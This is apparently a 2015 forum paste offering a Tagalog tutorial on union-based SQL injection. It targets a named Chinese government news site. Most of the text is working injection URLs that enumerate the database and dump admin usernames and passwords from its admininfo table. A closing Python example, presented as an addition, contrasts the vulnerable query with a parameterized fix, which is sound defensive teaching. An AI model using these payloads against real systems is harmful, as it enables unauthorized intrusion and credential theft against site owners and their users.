ZeusOdin

Tagalog SQL-injection (union base) tutorial by Ch1ch4n.47

May 4th, 2015
target: http://www.tchjbh.gov.cn/news_display.php?id=148
This is what it looks like.

http://i247.photobucket.com/albums/gg151/titian_47/1_zps01dc4846.jpg

Need: Firefox browser with the HackBar add-on. If you don't have HackBar, Chrome works too, as long as you replace every space with [ + ] or [ %20 ]. Example: http://www.tchjbh.gov.cn/news_display.php?id=148+union+select+1--

1. Vulnerability checking = to check whether the website is vulnerable, we need to put an apostrophe ['] right after the number... [ news_display.php?id=148' ]. A MySQL error blah blah blah will appear on the website, meaning it is vulnerable to the injection we're going to do!

http://i247.photobucket.com/albums/gg151/titian_47/2_zpsa09eaf04.jpg?t=1403438834

2. Column number checking = to check how many columns the website has, we need to test one by one until we see the error. What we'll use is [ ORDER BY #-- ]
http://www.tchjbh.gov.cn/news_display.php?id=148 ORDER BY 1-- no error
http://www.tchjbh.gov.cn/news_display.php?id=148 ORDER BY 2-- no error
http://www.tchjbh.gov.cn/news_display.php?id=148 ORDER BY 3-- no error (I'm taking a shortcut here!! because the error is all the way at 22!!)
http://www.tchjbh.gov.cn/news_display.php?id=148 ORDER BY 22-- MySQL error once we reach 22

So it errored at ORDER BY 22--, meaning we have 21 columns.

3: Finding the vulnerable column = since we saw an error at 22, we have 21 numbers.. here's what we do to check: put a [ - ] in front of the number, news_display.php?id=-148, and add [ union select #-- ]
http://www.tchjbh.gov.cn/news_display.php?id=-148 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
You'll see the number 14 on the website, meaning that's the vulnerable number, it's at 14!!

http://i247.photobucket.com/albums/gg151/titian_47/3_zpsb63fede3.jpg

4. SQL version = in position 14, just replace it with @@version so we can learn the SQL version, like this
http://www.tchjbh.gov.cn/news_display.php?id=-148 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,@@version,15,16,17,18,19,20,21--
You'll see [ 5.1.56-community ]; that's the SQL version.. it's version 5, so the union based method is the right one here, because for version 4 the blind method is used.

http://i247.photobucket.com/albums/gg151/titian_47/4_zps7f8d2870.jpg

5. Current user = replace it with [user()] so we learn the user
http://www.tchjbh.gov.cn/news_display.php?id=-148 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,user(),15,16,17,18,19,20,21--
This is what comes out there! tchjbh@127.0.0.1

http://i247.photobucket.com/albums/gg151/titian_47/5_zpse6b83f3f.jpg

6: Database name. Just like this!!
http://www.tchjbh.gov.cn/news_display.php?id=-148 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(schema_name),15,16,17,18,19,20,21 from information_schema.schemata--
or
http://www.tchjbh.gov.cn/news_display.php?id=-148 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,concat(database()),15,16,17,18,19,20,21--
Like this you'll see [tchjbh]; that's the database name

http://i247.photobucket.com/albums/gg151/titian_47/6_zpsf8b95db4.jpg

7: Finding the table name. This is the most fun part!! hahaha
group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()--
Like this: http://www.tchjbh.gov.cn/news_display.php?id=-148 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(table_name),15,16,17,18,19,20,21 FROM information_schema.tables WHERE table_schema=database()--
We'll see the list of table names!! But all we need is [admininfo], that's what we'll take!! Sometimes the table is named admin, users, members, etc..

http://i247.photobucket.com/albums/gg151/titian_47/7_zpsae8042fe.jpg

8: Finding the column name
group_concat(column_name) FROM information_schema.columns WHERE table_schema=database()--
http://www.tchjbh.gov.cn/news_display.php?id=-148 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(column_name),15,16,17,18,19,20,21 FROM information_schema.columns WHERE table_schema=database()--
We'll see [ username and passwd ] in the columns

http://i247.photobucket.com/albums/gg151/titian_47/8_zpsddd3ce3b.jpg

Last part.

9. Dumping admin and password. If you notice, we got the table name and column name. The column and table we got are what we'll use here. [0x3a] goes after the username and passwd
group_concat(username,0x3a,passwd,0x3a) from admininfo--
http://www.tchjbh.gov.cn/news_display.php?id=-148+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(username,0x3a,passwd,0x3a),15,16,17,18,19,20,21+FROM+admininfo--

http://i247.photobucket.com/albums/gg151/titian_47/9_zps78c6b2b2.jpg?t=1403440294
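Steps 3 to 9 only work because the id value is pasted into the SQL text and parsed as SQL. As an added example (not part of the paste), here is that vulnerable pattern beside its parameterized fix, run against a constructed in-memory SQLite stand-in; the table and column names, the sample rows and the payload scaled down to three columns instead of the site's 21 are all assumptions.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    # Constructed sample data standing in for the site's MySQL database.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO news VALUES (148, 'Notice', 'Public announcement text');
        CREATE TABLE admininfo (username TEXT, passwd TEXT);
        INSERT INTO admininfo VALUES ('admin', 'REDACTED-HASH-PLACEHOLDER');
    """)
    return conn

def news_display_vulnerable(conn, raw_id: str):
    # Mirrors the bug behind news_display.php?id=...: the query-string value
    # is concatenated into the SQL text, so attacker input becomes SQL syntax.
    sql = f"SELECT id, title, body FROM news WHERE id = {raw_id}"
    return conn.execute(sql).fetchall()

def news_display_fixed(conn, raw_id: str):
    # Hardened: SQL text is constant and the value is bound as a parameter.
    # The int() cast also rejects anything that is not a plain number.
    try:
        news_id = int(raw_id)
    except ValueError:
        return []
    return conn.execute(
        "SELECT id, title, body FROM news WHERE id = ?", (news_id,)
    ).fetchall()

# The paste's union payload, scaled to this table's three columns. The
# negative id matches no real row, so only the injected row is rendered,
# which is why step 3 of the paste prepends '-' to the id.
PAYLOAD = "-148 UNION SELECT 1, username, passwd FROM admininfo--"

def demo():
    conn = make_db()
    leaked = news_display_vulnerable(conn, PAYLOAD)   # admin row comes back
    blocked = news_display_fixed(conn, PAYLOAD)       # payload rejected
    normal = news_display_fixed(conn, "148")          # legitimate use still works
    return leaked, blocked, normal

if __name__ == "__main__":
    leaked, blocked, normal = demo()
    print("vulnerable handler, payload:", leaked)
    print("fixed handler, same payload:", blocked)
    print("fixed handler, id=148:", normal)
```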